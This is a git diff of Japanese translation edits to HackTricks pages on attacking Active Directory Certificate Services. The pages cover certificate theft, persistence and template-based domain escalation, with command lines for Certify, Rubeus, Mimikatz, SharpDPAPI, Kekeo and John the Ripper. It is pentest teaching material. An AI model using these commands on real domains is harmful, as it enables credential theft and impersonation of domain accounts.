+- **拡張キー使用法（EKU）**は、オブジェクト識別子（OID）を通じて、コード署名やメール暗号化など、証明書の特定の目的を示します。
 - **署名アルゴリズム**は、証明書に署名する方法を指定します。
 - **署名**は、発行者のプライベートキーで作成され、証明書の真正性を保証します。
 
@@ -23,12 +23,12 @@
 
 ### Certificate Authorities (CAs) in Active Directory (AD)
 
-AD CSは、ADフォレスト内のCA証明書を指定されたコンテナを通じて認識し、それぞれが独自の役割を果たします：
+AD CSは、指定されたコンテナを通じてADフォレスト内のCA証明書を認識し、それぞれが独自の役割を果たします：
 
 - **Certification Authorities**コンテナは、信頼されたルートCA証明書を保持します。
 - **Enrolment Services**コンテナは、エンタープライズCAとその証明書テンプレートの詳細を示します。
 - **NTAuthCertificates**オブジェクトは、AD認証のために承認されたCA証明書を含みます。
-- **AIA (Authority Information Access)**コンテナは、中間CAおよびクロスCA証明書を使用して証明書チェーンの検証を促進します。
+- **AIA (Authority Information Access)**コンテナは、中間CAおよびクロスCA証明書を使用して証明書チェーンの検証を容易にします。
 
 ### Certificate Acquisition: Client Certificate Request Flow
 
@@ -39,7 +39,7 @@ AD CSは、ADフォレスト内のCA証明書を指定されたコンテナを
 
 ### Certificate Templates
 
-AD内で定義されたこれらのテンプレートは、証明書を発行するための設定と権限を概説し、許可されたEKUや登録または変更権限を含み、証明書サービスへのアクセス管理において重要です。
+AD内で定義されているこれらのテンプレートは、証明書を発行するための設定と権限を概説し、許可されたEKUや登録または変更権限を含み、証明書サービスへのアクセス管理において重要です。
 
 ## Certificate Enrollment
 
@@ -72,9 +72,9 @@ CAの権限は、そのセキュリティ記述子に記載されており、証
 
 1. **Windows Client Certificate Enrollment Protocol** (MS-WCCE)、DCOMインターフェースを使用。
 2. **ICertPassage Remote Protocol** (MS-ICPR)、名前付きパイプまたはTCP/IPを介して。
-3. **証明書登録ウェブインターフェース**、証明書機関ウェブ登録役割がインストールされていること。
-4. **Certificate Enrollment Service** (CES)、証明書登録ポリシー（CEP）サービスと連携。
-5. **Network Device Enrollment Service** (NDES)、ネットワークデバイス用、シンプル証明書登録プロトコル（SCEP）を使用。
+3. **証明書登録Webインターフェース**、証明書機関Web登録役割がインストールされていること。
+4. **証明書登録サービス** (CES)、証明書登録ポリシー（CEP）サービスと連携して。
+5. **ネットワークデバイス登録サービス** (NDES)、ネットワークデバイス用に、シンプル証明書登録プロトコル（SCEP）を使用。
 
 Windowsユーザーは、GUI（`certmgr.msc`または`certlm.msc`）またはコマンドラインツール（`certreq.exe`またはPowerShellの`Get-Certificate`コマンド）を介しても証明書をリクエストできます。
 ```powershell
@@ -95,7 +95,7 @@ CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=<do
 
 ### セキュアチャネル (Schannel) 認証
 
-Schannelは、安全なTLS/SSL接続を促進し、ハンドシェイク中にクライアントが証明書を提示します。証明書が正常に検証されると、アクセスが許可されます。証明書をADアカウントにマッピングするには、Kerberosの**S4U2Self**機能や証明書の**Subject Alternative Name (SAN)**など、他の方法が関与する場合があります。
+Schannelは安全なTLS/SSL接続を促進し、ハンドシェイク中にクライアントが証明書を提示します。証明書が正常に検証されると、アクセスが許可されます。証明書をADアカウントにマッピングするには、Kerberosの**S4U2Self**機能や証明書の**Subject Alternative Name (SAN)**など、他の方法が関与する場合があります。
 
 ### AD証明書サービスの列挙
 
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/README.md b/src/windows-hardening/active-directory-methodology/ad-certificates/README.md
index 5c74e56e7..4286e9c2d 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/README.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/README.md
@@ -13,13 +13,13 @@
 - **発行者**は、証明書を発行したCAを指します。
 - **SubjectAlternativeName**は、主題の追加名を許可し、識別の柔軟性を高めます。
 - **基本制約**は、証明書がCA用かエンドエンティティ用かを識別し、使用制限を定義します。
-- **拡張キー使用法（EKU）**は、オブジェクト識別子（OID）を通じて、コード署名やメール暗号化など、証明書の特定の目的を示します。
+- **拡張キー使用法（EKU）**は、オブジェクト識別子（OID）を通じて、コード署名やメール暗号化など、証明書の特定の目的を区別します。
 - **署名アルゴリズム**は、証明書に署名する方法を指定します。
 - **署名**は、発行者のプライベートキーで作成され、証明書の真正性を保証します。
 
 ### Special Considerations
 
-- **Subject Alternative Names (SANs)**は、証明書の適用範囲を複数のアイデンティティに拡張し、複数のドメインを持つサーバーにとって重要です。攻撃者がSAN仕様を操作するリスクを避けるために、安全な発行プロセスが重要です。
+- **Subject Alternative Names (SANs)**は、証明書の適用範囲を複数のアイデンティティに拡張し、複数のドメインを持つサーバーにとって重要です。攻撃者がSAN仕様を操作することによるなりすましリスクを回避するために、安全な発行プロセスが重要です。
 
 ### Certificate Authorities (CAs) in Active Directory (AD)
 
@@ -43,13 +43,13 @@ AD内で定義されているこれらのテンプレートは、証明書を発
 
 ## Certificate Enrollment
 
-証明書の登録プロセスは、管理者が**証明書テンプレートを作成**し、それがエンタープライズ証明書機関（CA）によって**公開**されることで開始されます。これにより、クライアントの登録に利用可能なテンプレートが作成され、Active Directoryオブジェクトの`certificatetemplates`フィールドにテンプレート名を追加することで達成されます。
+証明書の登録プロセスは、管理者が**証明書テンプレートを作成**し、それがエンタープライズ証明書機関（CA）によって**公開**されることから始まります。これにより、クライアントの登録に利用可能なテンプレートが作成され、Active Directoryオブジェクトの`certificatetemplates`フィールドにテンプレート名を追加することで達成されます。
 
 クライアントが証明書をリクエストするには、**登録権限**が付与されている必要があります。これらの権限は、証明書テンプレートおよびエンタープライズCA自体のセキュリティ記述子によって定義されます。リクエストが成功するためには、両方の場所で権限が付与される必要があります。
 
 ### Template Enrollment Rights
 
-これらの権限は、アクセス制御エントリ（ACE）を通じて指定され、次のような権限が詳細に示されます：
+これらの権限は、アクセス制御エントリ（ACE）を通じて指定され、次のような権限が詳細に記載されています：
 
 - **Certificate-Enrollment**および**Certificate-AutoEnrollment**権限は、それぞれ特定のGUIDに関連付けられています。
 - **ExtendedRights**は、すべての拡張権限を許可します。
@@ -57,7 +57,7 @@ AD内で定義されているこれらのテンプレートは、証明書を発
 
 ### Enterprise CA Enrollment Rights
 
-CAの権限は、そのセキュリティ記述子に記載されており、証明書機関管理コンソールを介してアクセス可能です。一部の設定では、低権限のユーザーにリモートアクセスを許可することもあり、これはセキュリティ上の懸念となる可能性があります。
+CAの権限は、そのセキュリティ記述子に記載されており、証明書機関管理コンソールを介してアクセス可能です。一部の設定では、低特権ユーザーにリモートアクセスを許可することもあり、これはセキュリティ上の懸念となる可能性があります。
 
 ### Additional Issuance Controls
 
@@ -74,7 +74,7 @@ CAの権限は、そのセキュリティ記述子に記載されており、証
 2. **ICertPassage Remote Protocol** (MS-ICPR)、名前付きパイプまたはTCP/IPを介して。
 3. **証明書登録ウェブインターフェース**、証明書機関ウェブ登録役割がインストールされていること。
 4. **Certificate Enrollment Service** (CES)、証明書登録ポリシー（CEP）サービスと連携して。
-5. **Network Device Enrollment Service** (NDES)、ネットワークデバイス用に、シンプル証明書登録プロトコル（SCEP）を使用。
+5. **Network Device Enrollment Service** (NDES)、ネットワークデバイス用、シンプル証明書登録プロトコル（SCEP）を使用。
 
 Windowsユーザーは、GUI（`certmgr.msc`または`certlm.msc`）またはコマンドラインツール（`certreq.exe`またはPowerShellの`Get-Certificate`コマンド）を介しても証明書をリクエストできます。
 ```powershell
@@ -87,15 +87,15 @@ Active Directory (AD) は、主に **Kerberos** と **Secure Channel (Schannel)*
 
 ### Kerberos 認証プロセス
 
-Kerberos 認証プロセスでは、ユーザーの Ticket Granting Ticket (TGT) の要求がユーザーの証明書の **秘密鍵** を使用して署名されます。この要求は、ドメインコントローラーによって、証明書の **有効性**、**パス**、および **失効状況** を含むいくつかの検証を受けます。検証には、証明書が信頼できるソースから来ていることの確認や、**NTAUTH 証明書ストア** に発行者が存在することの確認も含まれます。検証が成功すると、TGT が発行されます。AD の **`NTAuthCertificates`** オブジェクトは、次の場所にあります:
+Kerberos 認証プロセスでは、ユーザーの Ticket Granting Ticket (TGT) の要求がユーザーの証明書の **秘密鍵** を使用して署名されます。この要求は、証明書の **有効性**、**パス**、および **失効状況** を含むいくつかの検証をドメインコントローラーによって受けます。検証には、証明書が信頼できるソースから来ていることの確認や、**NTAUTH 証明書ストア** に発行者が存在することの確認も含まれます。検証が成功すると、TGT が発行されます。AD の **`NTAuthCertificates`** オブジェクトは、次の場所にあります:
 ```bash
 CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=<domain>,DC=<com>
 ```
 信頼を確立するために中心的な役割を果たします。
 
-### Secure Channel (Schannel) 認証
+### セキュアチャネル (Schannel) 認証
 
-Schannelは安全なTLS/SSL接続を促進し、ハンドシェイク中にクライアントが証明書を提示します。証明書が正常に検証されると、アクセスが許可されます。証明書をADアカウントにマッピングするには、Kerberosの**S4U2Self**機能や証明書の**Subject Alternative Name (SAN)**など、他の方法が関与する場合があります。
+Schannelは、安全なTLS/SSL接続を促進します。ハンドシェイク中に、クライアントは証明書を提示し、成功裏に検証されるとアクセスが許可されます。証明書をADアカウントにマッピングするには、Kerberosの**S4U2Self**機能や証明書の**Subject Alternative Name (SAN)**など、他の方法が関与する場合があります。
 
 ### AD証明書サービスの列挙
 
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md b/src/windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md
index 11638adce..d21983c2a 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md
@@ -6,7 +6,7 @@
 
 ## **証明書を使用したアクティブユーザー資格情報の盗難の理解 – PERSIST1**
 
-ドメイン認証を許可する証明書がユーザーによって要求できるシナリオでは、攻撃者はこの証明書を**要求**し、**盗む**機会があり、ネットワーク上で**持続性を維持**することができます。デフォルトでは、Active Directoryの`User`テンプレートはそのような要求を許可しますが、時には無効にされることもあります。
+ドメイン認証を許可する証明書がユーザーによって要求できるシナリオでは、攻撃者はこの証明書を**要求**し、**盗む**機会を得て、ネットワーク上で**持続性**を維持することができます。デフォルトでは、Active Directoryの`User`テンプレートはそのような要求を許可しますが、時には無効にされることもあります。
 
 [**Certify**](https://github.com/GhostPack/Certify)というツールを使用すると、持続的なアクセスを可能にする有効な証明書を検索できます：
 ```bash
@@ -22,7 +22,7 @@ Certify.exe request /ca:CA-SERVER\CA-NAME /template:TEMPLATE-NAME
 ```bash
 openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
 ```
-`.pfx`ファイルはターゲットシステムにアップロードされ、[**Rubeus**](https://github.com/GhostPack/Rubeus)というツールを使用してユーザーのチケットグラントチケット（TGT）を要求するために使用され、攻撃者のアクセスを証明書が**有効**である限り（通常は1年）延長します：
+`.pfx`ファイルはターゲットシステムにアップロードされ、[**Rubeus**](https://github.com/GhostPack/Rubeus)というツールを使用してユーザーのためにチケットグラントチケット（TGT）を要求するために使用され、攻撃者のアクセスを証明書が**有効**である限り（通常は1年）延長します：
 ```bash
 Rubeus.exe asktgt /user:harmj0y /certificate:C:\Temp\cert.pfx /password:CertPass!
 ```
@@ -40,6 +40,6 @@ Certify.exe request /ca:dc.theshire.local/theshire-DC-CA /template:Machine /mach
 
 最後に議論される方法は、証明書テンプレートの**有効性**と**更新期間**を利用することです。証明書が期限切れになる前に**更新**することで、攻撃者は追加のチケット登録を必要とせずにActive Directoryへの認証を維持でき、これにより証明書認証局（CA）サーバーに痕跡を残すことがありません。
 
-このアプローチは、CAサーバーとの相互作用を最小限に抑え、管理者に侵入を警告する可能性のあるアーティファクトの生成を回避することで、**持続性の拡張**方法を可能にします。
+このアプローチは、CAサーバーとの相互作用を最小限に抑え、管理者に侵入を警告する可能性のあるアーティファクトの生成を回避することで、**拡張された持続性**の方法を提供します。
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md b/src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md
index 1a49392d4..7a2bfc9bf 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md
@@ -22,11 +22,11 @@ certutil.exe -dump -v cert.pfx
 
 **インタラクティブデスクトップセッション**では、ユーザーまたはマシンの証明書をプライベートキーと共に抽出することは簡単に行えます。特に、**プライベートキーがエクスポート可能な場合**はそうです。これは、`certmgr.msc`で証明書に移動し、右クリックして`すべてのタスク → エクスポート`を選択することで、パスワード保護された.pfxファイルを生成できます。
 
-**プログラム的アプローチ**では、PowerShellの`ExportPfxCertificate`コマンドレットや、[TheWoverのCertStealer C#プロジェクト](https://github.com/TheWover/CertStealer)のようなツールが利用可能です。これらは、証明書ストアと対話するために**Microsoft CryptoAPI**（CAPI）またはCryptography API: Next Generation（CNG）を利用します。これらのAPIは、証明書の保存と認証に必要な暗号サービスの範囲を提供します。
+**プログラム的アプローチ**では、PowerShellの`ExportPfxCertificate`コマンドレットや、[TheWoverのCertStealer C#プロジェクト](https://github.com/TheWover/CertStealer)のようなツールが利用可能です。これらは、証明書ストアと対話するために**Microsoft CryptoAPI**（CAPI）またはCryptography API: Next Generation（CNG）を利用します。これらのAPIは、証明書の保存と認証に必要なさまざまな暗号サービスを提供します。
 
 ただし、プライベートキーがエクスポート不可に設定されている場合、通常CAPIとCNGはそのような証明書の抽出をブロックします。この制限を回避するために、**Mimikatz**のようなツールを使用できます。Mimikatzは、プライベートキーのエクスポートを可能にするために、対応するAPIをパッチする`crypto::capi`および`crypto::cng`コマンドを提供します。具体的には、`crypto::capi`は現在のプロセス内のCAPIをパッチし、`crypto::cng`は**lsass.exe**のメモリをターゲットにしてパッチを適用します。
 
-## DPAPIを介したユーザー証明書の盗難 – THEFT2
+## DPAPIによるユーザー証明書の盗難 – THEFT2
 
 DPAPIに関する詳細情報は以下を参照してください：
 
@@ -36,9 +36,9 @@ DPAPIに関する詳細情報は以下を参照してください：
 
 Windowsでは、**証明書のプライベートキーはDPAPIによって保護されています**。**ユーザーおよびマシンのプライベートキーの保存場所**が異なることを認識することが重要であり、ファイル構造はオペレーティングシステムによって使用される暗号APIに応じて異なります。**SharpDPAPI**は、DPAPIブロブを復号化する際にこれらの違いを自動的にナビゲートできるツールです。
 
-**ユーザー証明書**は主に`HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates`のレジストリに格納されていますが、一部は`%APPDATA%\Microsoft\SystemCertificates\My\Certificates`ディレクトリにも見つかります。これらの証明書に対応する**プライベートキー**は、通常**CAPI**キーの場合は`%APPDATA%\Microsoft\Crypto\RSA\User SID\`に、**CNG**キーの場合は`%APPDATA%\Microsoft\Crypto\Keys\`に保存されています。
+**ユーザー証明書**は主に`HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates`のレジストリに格納されていますが、一部は`%APPDATA%\Microsoft\SystemCertificates\My\Certificates`ディレクトリにも見つかります。これらの証明書に対応する**プライベートキー**は、**CAPI**キーの場合は`%APPDATA%\Microsoft\Crypto\RSA\User SID\`に、**CNG**キーの場合は`%APPDATA%\Microsoft\Crypto\Keys\`に通常保存されています。
 
-**証明書とその関連するプライベートキーを抽出する**ためのプロセスは以下の通りです：
+**証明書とその関連するプライベートキーを抽出する**プロセスは以下の通りです：
 
 1. ユーザーのストアから**ターゲット証明書を選択**し、そのキー ストア名を取得します。
 2. 対応するプライベートキーを復号化するために必要な**DPAPIマスタキーを特定**します。
@@ -52,7 +52,7 @@ dpapi::masterkey /in:"C:\PATH\TO\KEY" /rpc
 # With mimikatz, if the user's password is known
 dpapi::masterkey /in:"C:\PATH\TO\KEY" /sid:accountSid /password:PASS
 ```
-マスターキーファイルとプライベートキーファイルの復号化を効率化するために、[**SharpDPAPI**](https://github.com/GhostPack/SharpDPAPI) の `certificates` コマンドが有益です。このコマンドは、プライベートキーと関連する証明書を復号化するために、`/pvk`、`/mkfile`、`/password`、または `{GUID}:KEY` を引数として受け取り、その後 `.pem` ファイルを生成します。
+マスタキーファイルとプライベートキーファイルの復号化を効率化するために、[**SharpDPAPI**](https://github.com/GhostPack/SharpDPAPI) の `certificates` コマンドが有益です。このコマンドは、プライベートキーと関連する証明書を復号化するために、`/pvk`、`/mkfile`、`/password`、または `{GUID}:KEY` を引数として受け取り、その後 `.pem` ファイルを生成します。
 ```bash
 # Decrypting using SharpDPAPI
 SharpDPAPI.exe certificates /mkfile:C:\temp\mkeys.txt
@@ -62,24 +62,24 @@ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provid
 ```
 ## マシン証明書の窃盗 via DPAPI – THEFT3
 
-Windowsによってレジストリの `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates` に保存されているマシン証明書と、`%ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\RSA\MachineKeys` (CAPI用) および `%ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\Keys` (CNG用) にある関連するプライベートキーは、マシンのDPAPIマスタキーを使用して暗号化されています。これらのキーはドメインのDPAPIバックアップキーで復号化することはできず、代わりに**DPAPI_SYSTEM LSAシークレット**が必要で、これはSYSTEMユーザーのみがアクセスできます。
+Windowsによってレジストリの `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates` に保存されているマシン証明書と、関連するプライベートキーは、`%ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\RSA\MachineKeys`（CAPI用）および `%ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\Keys`（CNG用）にあり、マシンのDPAPIマスタキーを使用して暗号化されています。これらのキーは、ドメインのDPAPIバックアップキーでは復号化できません。代わりに、**DPAPI_SYSTEM LSAシークレット**が必要で、これはSYSTEMユーザーのみがアクセスできます。
 
-手動での復号化は、**Mimikatz**で `lsadump::secrets` コマンドを実行してDPAPI_SYSTEM LSAシークレットを抽出し、その後このキーを使用してマシンマスタキーを復号化することで実現できます。あるいは、前述のようにCAPI/CNGをパッチした後にMimikatzの `crypto::certificates /export /systemstore:LOCAL_MACHINE` コマンドを使用することもできます。
+手動復号化は、**Mimikatz**で `lsadump::secrets` コマンドを実行してDPAPI_SYSTEM LSAシークレットを抽出し、その後このキーを使用してマシンマスタキーを復号化することで達成できます。あるいは、Mimikatzの `crypto::certificates /export /systemstore:LOCAL_MACHINE` コマンドを、前述のようにCAPI/CNGをパッチ適用した後に使用することもできます。
 
-**SharpDPAPI**は、その証明書コマンドを使用してより自動化されたアプローチを提供します。`/machine` フラグを昇格した権限で使用すると、SYSTEMに昇格し、DPAPI_SYSTEM LSAシークレットをダンプし、それを使用してマシンDPAPIマスタキーを復号化し、これらの平文キーをルックアップテーブルとして使用して任意のマシン証明書のプライベートキーを復号化します。
+**SharpDPAPI**は、証明書コマンドを使用したより自動化されたアプローチを提供します。`/machine` フラグを昇格した権限で使用すると、SYSTEMに昇格し、DPAPI_SYSTEM LSAシークレットをダンプし、それを使用してマシンDPAPIマスタキーを復号化し、これらの平文キーをルックアップテーブルとして使用して、任意のマシン証明書のプライベートキーを復号化します。
 
 ## 証明書ファイルの検索 – THEFT4
 
-証明書は、ファイル共有やダウンロードフォルダなど、ファイルシステム内に直接見つかることがあります。Windows環境を対象とした最も一般的に遭遇する証明書ファイルの種類は、`.pfx` および `.p12` ファイルです。頻度は低いですが、拡張子が `.pkcs12` および `.pem` のファイルも現れます。その他の注目すべき証明書関連のファイル拡張子には以下が含まれます：
+証明書は、ファイル共有やダウンロードフォルダなど、ファイルシステム内に直接見つかることがあります。Windows環境を対象とした最も一般的に遭遇する証明書ファイルのタイプは、`.pfx` および `.p12` ファイルです。頻度は低いですが、拡張子が `.pkcs12` および `.pem` のファイルも現れます。その他の注目すべき証明書関連のファイル拡張子には以下が含まれます：
 
 - プライベートキー用の `.key`
 - 証明書のみのための `.crt`/`.cer`
 - 証明書やプライベートキーを含まない証明書署名要求用の `.csr`
-- Javaアプリケーションで使用されるプライベートキーと共に証明書を保持する可能性のあるJavaキーストア用の `.jks`/`.keystore`/`.keys`
+- Javaアプリケーションで使用される証明書とプライベートキーを保持する可能性のあるJavaキーストア用の `.jks`/`.keystore`/`.keys`
 
 これらのファイルは、PowerShellやコマンドプロンプトを使用して、前述の拡張子を探すことで検索できます。
 
-PKCS#12証明書ファイルが見つかり、パスワードで保護されている場合、`pfx2john.py` を使用してハッシュを抽出することが可能です。このツールは [fossies.org](https://fossies.org/dox/john-1.9.0-jumbo-1/pfx2john_8py_source.html) で入手できます。その後、JohnTheRipperを使用してパスワードのクラッキングを試みることができます。
+PKCS#12証明書ファイルが見つかり、パスワードで保護されている場合、`pfx2john.py` を使用してハッシュを抽出することが可能です。このスクリプトは [fossies.org](https://fossies.org/dox/john-1.9.0-jumbo-1/pfx2john_8py_source.html) で入手できます。その後、JohnTheRipperを使用してパスワードのクラッキングを試みることができます。
 ```powershell
 # Example command to search for certificate files in PowerShell
 Get-ChildItem -Recurse -Path C:\Users\ -Include *.pfx, *.p12, *.pkcs12, *.pem, *.key, *.crt, *.cer, *.csr, *.jks, *.keystore, *.keys
@@ -92,16 +92,16 @@ john --wordlist=passwords.txt hash.txt
 ```
 ## NTLM資格情報の窃盗 via PKINIT – THEFT5
 
-与えられた内容は、PKINITを介したNTLM資格情報の窃盗の方法、特にTHEFT5としてラベル付けされた窃盗方法について説明しています。以下は、受動態での再説明であり、内容は匿名化され、適用可能な場合は要約されています。
+与えられた内容は、PKINITを介したNTLM資格情報の窃盗の方法、特にTHEFT5とラベル付けされた窃盗方法について説明しています。以下は、受動態での再説明であり、内容は匿名化され、適用可能な場合は要約されています。
 
-Kerberos認証をサポートしないアプリケーションのためにNTLM認証[MS-NLMP]を提供するために、KDCはPKCAが利用される際に、特に`PAC_CREDENTIAL_INFO`バッファ内でユーザーのNTLM一方向関数（OWF）を返すように設計されています。したがって、アカウントがPKINITを介してチケット授与チケット（TGT）を認証し取得する場合、現在のホストがTGTからNTLMハッシュを抽出してレガシー認証プロトコルを維持するためのメカニズムが本質的に提供されます。このプロセスは、NTLMプレーンテキストのNDRシリアライズされた表現である`PAC_CREDENTIAL_DATA`構造の復号化を含みます。
+Kerberos認証をサポートしないアプリケーションのためにNTLM認証[MS-NLMP]を提供するために、KDCはPKCAが利用される際に、特に`PAC_CREDENTIAL_INFO`バッファ内でユーザーのNTLM一方向関数（OWF）を返すように設計されています。したがって、アカウントがPKINITを介して認証し、チケット授与チケット（TGT）を取得すると、現在のホストがTGTからNTLMハッシュを抽出してレガシー認証プロトコルを維持するためのメカニズムが本質的に提供されます。このプロセスは、NTLMプレーンテキストのNDRシリアライズされた表現である`PAC_CREDENTIAL_DATA`構造の復号化を含みます。
 
-ユーティリティ**Kekeo**は、[https://github.com/gentilkiwi/kekeo](https://github.com/gentilkiwi/kekeo)でアクセス可能であり、この特定のデータを含むTGTを要求することができるとされています。これを目的としたコマンドは以下の通りです：
+ユーティリティ**Kekeo**は、[https://github.com/gentilkiwi/kekeo](https://github.com/gentilkiwi/kekeo)でアクセス可能であり、この特定のデータを含むTGTを要求することができると述べられています。これを目的としたコマンドは以下の通りです：
 ```bash
 tgt::pac /caname:generic-DC-CA /subject:genericUser /castore:current_user /domain:domain.local
 ```
-さらに、Kekeoはスマートカード保護された証明書を処理できることが記載されており、PINが取得できる場合に限ります。これは[https://github.com/CCob/PinSwipe](https://github.com/CCob/PinSwipe)に言及されています。同様の機能は、[https://github.com/GhostPack/Rubeus](https://github.com/GhostPack/Rubeus)で入手可能な**Rubeus**でもサポートされていると示されています。
+さらに、Kekeoはスマートカード保護された証明書を処理できることが記載されており、PINが取得できる場合に限ります。参照先は[https://github.com/CCob/PinSwipe](https://github.com/CCob/PinSwipe)です。同様の機能は**Rubeus**でもサポートされており、こちらは[https://github.com/GhostPack/Rubeus](https://github.com/GhostPack/Rubeus)で入手可能です。
 
-この説明は、PKINITを介したNTLM資格情報の盗難に関与するプロセスとツールを要約しており、PKINITを使用して取得したTGTを通じてNTLMハッシュの取得に焦点を当て、これを容易にするユーティリティについて説明しています。
+この説明は、PKINITを介したNTLM資格情報の盗難に関与するプロセスとツールを要約しており、PKINITを使用して取得したTGTを通じてNTLMハッシュを取得することに焦点を当て、これを容易にするユーティリティについて説明しています。
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
index a003a74c0..47d40df39 100644
--- a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
+++ b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
@@ -20,15 +20,15 @@
 - **証明書テンプレートのセキュリティ記述子は過度に許可されており、低特権ユーザーが登録権を取得できるようになっています。**
 - **証明書テンプレートは、認証を促進する EKU を定義するように構成されています：**
 - クライアント認証 (OID 1.3.6.1.5.5.7.3.2)、PKINIT クライアント認証 (1.3.6.1.5.2.3.4)、スマートカードログオン (OID 1.3.6.1.4.1.311.20.2.2)、任意の目的 (OID 2.5.29.37.0)、または EKU がない (SubCA) などの拡張キー使用 (EKU) 識別子が含まれています。
-- **リクエスターが証明書署名要求 (CSR) に subjectAltName を含めることができるのは、テンプレートによって許可されています：**
-- Active Directory (AD) は、証明書内の subjectAltName (SAN) をアイデンティティ検証のために優先します。これは、CSR に SAN を指定することで、任意のユーザー (例：ドメイン管理者) を偽装する証明書をリクエストできることを意味します。リクエスターが SAN を指定できるかどうかは、証明書テンプレートの AD オブジェクト内の `mspki-certificate-name-flag` プロパティによって示されます。このプロパティはビットマスクであり、`CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` フラグが存在する場合、リクエスターによる SAN の指定が許可されます。
+- **リクエスターが証明書署名要求 (CSR) に subjectAltName を含めることができる能力がテンプレートによって許可されています：**
+- Active Directory (AD) は、証明書に存在する場合、アイデンティティ検証のために subjectAltName (SAN) を優先します。これは、CSR に SAN を指定することによって、任意のユーザー (例：ドメイン管理者) を偽装するための証明書をリクエストできることを意味します。リクエスターが SAN を指定できるかどうかは、証明書テンプレートの AD オブジェクト内の `mspki-certificate-name-flag` プロパティによって示されます。このプロパティはビットマスクであり、`CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` フラグが存在する場合、リクエスターによる SAN の指定が許可されます。
 
 > [!CAUTION]
 > 概説された構成により、低特権ユーザーが任意の SAN を持つ証明書をリクエストできるようになり、Kerberos または SChannel を通じて任意のドメインプリンシパルとしての認証が可能になります。
 
 この機能は、製品や展開サービスによる HTTPS またはホスト証明書のオンザフライ生成をサポートするため、または理解不足のために有効にされることがあります。
 
-このオプションで証明書を作成すると警告がトリガーされることが記載されていますが、既存の証明書テンプレート (例えば、`CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` が有効な `WebServer` テンプレート) を複製して認証 OID を含めるように変更した場合はそうではありません。
+このオプションを使用して証明書を作成すると警告がトリガーされることが記載されていますが、既存の証明書テンプレート (例えば、`CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` が有効な `WebServer` テンプレート) を複製して認証 OID を含めるように変更した場合はその限りではありません。
 
 ### 悪用
 
@@ -57,7 +57,7 @@ ADフォレストの構成スキーマ内の証明書テンプレートの列挙
 
 ### 説明
 
-二つ目の悪用シナリオは最初のもののバリエーションです：
+二番目の悪用シナリオは最初のもののバリエーションです：
 
 1. エンタープライズCAによって低特権ユーザーに登録権が付与されます。
 2. マネージャーの承認要件が無効化されます。
@@ -69,7 +69,7 @@ ADフォレストの構成スキーマ内の証明書テンプレートの列挙
 
 **EKUなし**の証明書は、下位CA証明書として機能し、**任意の目的**で悪用される可能性があり、**新しい証明書に署名するためにも使用できます**。したがって、攻撃者は下位CA証明書を利用して新しい証明書に任意のEKUやフィールドを指定することができます。
 
-ただし、**ドメイン認証**のために作成された新しい証明書は、下位CAが**`NTAuthCertificates`**オブジェクトによって信頼されていない場合、機能しません。これはデフォルト設定です。それでも、攻撃者は**任意のEKU**と任意の証明書値を持つ**新しい証明書を作成する**ことができます。これらは、広範な目的（例：コード署名、サーバー認証など）で**悪用される可能性**があり、SAML、AD FS、またはIPSecなどのネットワーク内の他のアプリケーションに重大な影響を与える可能性があります。
+ただし、**ドメイン認証**のために作成された新しい証明書は、下位CAが**`NTAuthCertificates`**オブジェクトによって信頼されていない場合、機能しません。デフォルト設定ではそうなっています。それでも、攻撃者は**任意のEKU**と任意の証明書値を持つ**新しい証明書を作成する**ことができます。これらは、広範な目的（例：コード署名、サーバー認証など）で**悪用される可能性**があり、SAML、AD FS、またはIPSecなどのネットワーク内の他のアプリケーションに重大な影響を与える可能性があります。
 
 ADフォレストの構成スキーマ内でこのシナリオに一致するテンプレートを列挙するには、次のLDAPクエリを実行できます：
 ```
@@ -81,16 +81,16 @@ ADフォレストの構成スキーマ内でこのシナリオに一致するテ
 
 このシナリオは最初と二番目のものに似ていますが、**異なるEKU**（証明書要求エージェント）と**2つの異なるテンプレート**を**悪用**しています（したがって、2セットの要件があります）。
 
-**証明書要求エージェントEKU**（OID 1.3.6.1.4.1.311.20.2.1）は、Microsoftの文書で**登録エージェント**として知られており、ある主体が**他のユーザーの代理で**証明書に**登録**することを許可します。
+**証明書要求エージェントEKU**（OID 1.3.6.1.4.1.311.20.2.1）は、Microsoftの文書で**登録エージェント**として知られており、ある主体が**他のユーザー**の**代理**で**証明書**に**登録**することを許可します。
 
